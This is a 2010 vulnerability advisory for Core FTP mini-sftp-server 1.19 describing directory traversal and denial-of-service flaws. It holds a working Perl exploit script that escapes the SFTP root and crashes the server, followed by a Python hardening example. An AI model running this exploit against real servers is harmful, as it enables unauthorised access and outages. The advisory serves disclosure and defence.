Date of Discovery: 7-Jun-2010
Credits: leinakesi[at]gmail.com
Vendor: Core FTP mini-sftp-server
        http://www.coreftp.com/server/index.html
Affected: Core FTP mini-sftp-server version 1.19. Earlier versions may also be affected.

Overview:

"Core FTP Server" and "Core FTP mini-sftp-server" are both products of Core FTP that let you exchange files with others over a network or the Internet. I tested the SFTP module of "Core FTP Server" earlier and found several Denial of Service and Directory Traversal vulnerabilities. "Core FTP mini-sftp-server" behaves the same way as Core FTP Server does: it has the same vulnerabilities.

1. Directory Traversal vulnerability

An authenticated SFTP user can create a directory outside the configured root directory by sending a path with a "../" component; the server does not confine the request to the root:

    $m = $sftp->mkdir("../A/");   # creates folder "A" outside the root directory

2. Denial of Service vulnerability

An over-long argument (10000 bytes) in an SFTP open or stat request crashes the server. Any one of the following requests is enough:

    $o1 = $sftp->open("A" x 10000);
    $o2 = $sftp->open("test", "O_RDWR", "A" x 10000);
    $o3 = $sftp->open("test", "A" x 10000, 0666);
    $st = $sftp->stat("A" x 10000);

PS: thanks to Jeremy Brown, I learned a lot from his blog. ^_^

Exploit example:

#!/usr/bin/perl
# leinakesi[at]gmail.com
# thanks to Jeremy Brown, I learned a lot from his blog. ^_^
# The script first makes a folder "A" outside the root directory and then crashes the server.
use strict;
use warnings;
use Net::SSH2;
use Getopt::Std;

my $FUZZ = "A" x 10000;   # over-long argument used for the crash cases

my %opts;
getopts('S:P:u:p:', \%opts);
my $server = $opts{'S'};
my $port   = $opts{'P'};
my $user   = $opts{'u'};
my $pass   = $opts{'p'};

if (!defined($server) || !defined($port) || !defined($user) || !defined($pass)) {
    print "usage:\n\tperl test.pl -S [IP] -P [port] -u [user] -p [password]\nexample:\n";
    print "\tperl test.pl -S 192.168.48.114 -P 22 -u chloe -p 111111\n";
    exit(0);
}

my $ssh2 = Net::SSH2->new();
$ssh2->connect($server, $port)
    || die "can not connect to the server, please check.\n";
$ssh2->auth_password($user, $pass)
    || die "are you sure the user name and password are correct?\n";
my $sftp = $ssh2->sftp();

# 1. directory traversal: make a folder "A" outside the root directory
my $m = $sftp->mkdir("../A/");

# 2. denial of service: any one of the following requests crashes
#    Core FTP mini-sftp-server; the first is active, the others are kept
#    as alternatives.
my $o1 = $sftp->open($FUZZ);
#my $o2 = $sftp->open("test", "O_RDWR", $FUZZ);
#my $o3 = $sftp->open("test", $FUZZ, 0666);
#my $st = $sftp->stat($FUZZ);

$ssh2->disconnect();
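Both findings above come down to the server trusting the client-supplied path string: it is appended to the root without confinement (traversal) and handed on without a length bound (crash). The following is an added example of the server-side check that closes both holes; it is written for this page and is not code from the advisory or from Core FTP. The root, cwd and paths are constructed inputs, and the length limits MAX_PATH_LEN and MAX_NAME_LEN are assumptions chosen for the example, not values from the product.

```python
import posixpath

# Limits are assumptions for this example, not values from the advisory or the product.
MAX_PATH_LEN = 4096   # whole client-supplied path, in bytes/characters
MAX_NAME_LEN = 255    # a single path component


class SftpPathError(ValueError):
    """Raised for a client path that must be refused before the filesystem is touched."""


def naive_resolve(root, requested):
    """The unsafe pattern: trust the client string and append it to the root.

    For requested='../A/' the result points one level above the root, which is
    exactly what the mkdir('../A/') request in the advisory exploits.
    """
    return root.rstrip("/") + "/" + requested.lstrip("/")


def resolve_sftp_path(root, cwd, requested):
    """Map a client path onto the user's virtual root, chroot-style.

    1. Bound the total length and each component, so an over-long name such as
       'A' * 10000 is refused before any string-buffer or filesystem work.
    2. Treat backslashes as separators (the target is a Windows server), so
       '..\\..\\A' is not smuggled past a check that only knows '/'.
    3. Normalise lexically with the virtual root pinned at '/': posixpath.normpath
       clamps any run of '..' at the root, so nothing can climb above it.
    4. Join the clamped, absolute virtual path to the real root as a plain string;
       never use an OS join that would restart at a drive letter.
    """
    if len(requested) > MAX_PATH_LEN:
        raise SftpPathError("path longer than %d characters" % MAX_PATH_LEN)
    if "\x00" in requested:
        raise SftpPathError("NUL byte in path")

    virt = requested.replace("\\", "/")
    if not virt.startswith("/"):
        virt = posixpath.join(cwd, virt)          # cwd is an absolute virtual path
    virt = posixpath.normpath("/" + virt.lstrip("/"))   # '/..' and '/../A' become '/' and '/A'

    for name in virt.split("/"):
        if len(name) > MAX_NAME_LEN:
            raise SftpPathError("component longer than %d characters" % MAX_NAME_LEN)
        if ":" in name:
            raise SftpPathError("drive or stream syntax in component")   # Windows host caveat

    real_root = root.rstrip("/")
    real = real_root if virt == "/" else real_root + virt

    # Defence in depth: the mapped path must still sit at or under the root.
    if real != real_root and not real.startswith(real_root + "/"):
        raise SftpPathError("resolved path escaped the root")
    return real


def is_confined(root, real_path):
    """True if real_path is the root or lies under it (lexical check on normalised paths)."""
    r = posixpath.normpath(root)
    p = posixpath.normpath(real_path)
    return p == r or p.startswith(r + "/")


if __name__ == "__main__":
    ROOT = "/srv/sftp/chloe"            # constructed example root
    print("naive   ", naive_resolve(ROOT, "../A/"))
    print("hardened", resolve_sftp_path(ROOT, "/", "../A/"))
    try:
        resolve_sftp_path(ROOT, "/", "A" * 10000)
    except SftpPathError as e:
        print("refused :", e)
```

The naive function yields /srv/sftp/chloe/../A/, which is /srv/sftp/A once the filesystem resolves it; the hardened function maps the same request to /srv/sftp/chloe/A, and rejects the 10000-byte name outright instead of passing it on to the filesystem layer where the crash happens.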